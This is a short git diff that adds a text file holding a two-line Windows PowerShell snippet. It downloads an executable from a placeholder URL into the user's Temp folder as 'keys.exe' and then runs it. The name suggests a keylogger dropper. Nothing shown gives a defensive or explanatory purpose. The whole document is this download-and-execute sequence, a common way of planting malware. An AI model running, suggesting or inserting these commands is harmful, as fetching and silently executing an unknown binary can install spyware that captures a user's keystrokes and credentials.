diff --git a/windows-powershell.txt b/windows-powershell.txt new file mode 100644 index 0000000..3a87a31 --- /dev/null +++ b/windows-powershell.txt @@ -0,0 +1,2 @@ +Invoke-WebRequest URL -OutFile .\AppData\Local\Temp\keys.exe +Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow